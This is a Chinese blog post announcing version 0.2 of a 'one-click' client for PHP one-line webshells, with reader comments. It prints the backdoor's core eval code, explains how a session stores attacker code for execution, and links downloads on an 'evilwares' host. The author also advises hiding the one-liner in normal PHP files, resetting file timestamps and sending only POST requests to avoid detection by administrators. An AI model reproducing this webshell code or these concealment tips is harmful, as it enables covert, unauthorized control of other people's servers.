零魂PHP一句话木马客户端(一键提交版)

Author:零魂(zerosoul)

V0.2
2009-11-11(正好是光棍节,晕~)更新内容:
—————————–
1.修补了下原始版本有些服务器不能正常运行的大Bug。
2.去掉了提交后的登陆密码验证,提交后直接进入大马界面。

—————————–
更新说明:
—————————–

这玩意本来就是为了方便自己做的,所以本来只打算对自己负责,呵呵。好马好工具如果传出来必然被传烂掉,但这东西无所谓,又不是多特别的东西,但有时候用着比较方便,所以发出来也无妨。

但是发出来后有朋友告诉我有些服务器上运行没成功,心里顿觉愧疚,发个小东西出来,结果功能还有问题,岂不是欺骗大众。但是一直在忙,除了当时做的 时候之外,几乎再没去测试过。昨晚hiphop兄给我说他那有台服务器用不起,本来打算让他发Shell来我正好测试下具体原因,结果他说他已经测试了并 告诉是magic_quotes_gpc的原因(是个低级错误…),得谢谢他。
然后花了个把小时详细测试并修改了下

相关关键代码:

session_start();$_SESSION[chr(99)]=get_magic_quotes_gpc()?stripslashes($_POST[chr(100)]):$_POST[chr(100)];eval($_SESSION[chr(99)]);

—————————–
现在的版本magic_quotes_gpc On和Off都测试OK,不过不知道还有没有其它会造成不正常的因素,实在懒的自己去一个一个测试了,等遇到了再说吧,也欢迎大家反馈。
—————————–

下载:
http://evilwares.appspot.com/down/zerosoul_PHP_eval_Client_v0.2.rar

在线使用:
http://evilwares.appspot.com/static/eval.html

——————–

前天通宵到后半夜的时候,总觉得自己最近都没干什么实事,觉得有点虚度的味道,心中不免有些自责。为了宽慰自己,决定做点正事。然后就啥都没干,坐着干想该做什么。一直想到快天亮,总算想出点东西来了(- -!),也就是现在发布的这个东西。

海洋顶端有个一键提交版的ASP一句话客户端,很方便,一次提交之后,一句话就可以当大马用了。用这种客户端的话,留一句话的shell也就麻烦不到哪去了,而且把一句话藏在正常文件里面,再把时间改回正常,访问只用POST的话,基本是很难发现的。

但是PHP一句话一直没有见这样的客户端(不知道是不是我孤弱寡闻),网上居然还有转载的到处都是的工具,结果下载下来不能用…..
比较喜欢一句话的一键提交这种形式,所以花了2 x 半个通宵的时间做了这个东西,思路参考的是海洋,客户端的CSS也是修改它的,呵呵。

注意:

由于一键提交版的特殊性,暂时是不能随心所欲的换密码的,这个客户端的密码是字母c。(海洋的也是这样)。这个问题并不是不能解决,但是比较麻烦,所以还不如就用这密码呢,呵呵。

特点:

1.填好一句话WebShell地址和密码并点提交之后,后续操作不用再依赖客户端,基本上剩下的和操作大马没什么两样。

2.完全POST提交,避免了WebServer记录敏感数据。如果一句话插在有正常用户访问的PHP文件的话,插完时间也改回来了,那么管理员发现的概率就相当低了。(海洋的不是全POST)

大概原理:

一键提交版的一句话客户端连接成功之后,每次POST数据的时候, 假设一句话密码是c,都要先让本地表单:

c = session_start();eval($_SESSION[chr(120)]);

chr(120)就是字母c,为了避免单引号写成chr(120)形式。

然后一句话在eval($_POST[c])的时候,才能执行保存在Session中的我们的PHP代码。

想用其它密码的朋友可以依据这个原理修改。

下载:
http://evilwares.appspot.com/down/zerosoul_PHP_eval_Client.rar

在线使用:
http://evilwares.appspot.com/static/eval.html

相关日志

楼被抢了 5 层了... 抢座Rss 2.0或者 Trackback

  • hackest

    试了下,返回空白,并没有达到如期效果……

    • 零魂

      唔..这也转了,呵呵。
      这玩意本来是我为了自己方便随便弄的,花的时间也很少,没有大量测试,所以bug这些估计很多,从目前我自己测试的情况来看,在本机和3台服务器上没有出问题,而有一台像你说的那样返回空白,还有一台报错,最后发现是服务器限制了提交变量大小的原因。
      所以,一句话总结:通用性不是特别高。
      不过在可以使用的服务器上还是比较方便的(安慰下自己^_^)
      至于bug,只有在下次通宵没事做的时候调试了….

  • 零魂

    为了不误导大众,昨晚修补了下大Bug,呵呵。
    下载:
    http://evilwares.appspot.com/down/zerosoul_PHP_eval_Client_v0.2.rar

    • 筱枫

      eval()’d code(1) : eval()’d code on line 1
      现实这个是什么意思啊!

  • lanker

    很不错,05年做完lanker一句话木马客户端后,看到海洋的那个一键提交后我就想做PHP的,可当时正赶上毕业,加后来换工作,在再到创业,曾经研究过一次,没有完成,现在一直还放在那没动呢,感谢零魂填补了PHP一键提交的空白!

发表评论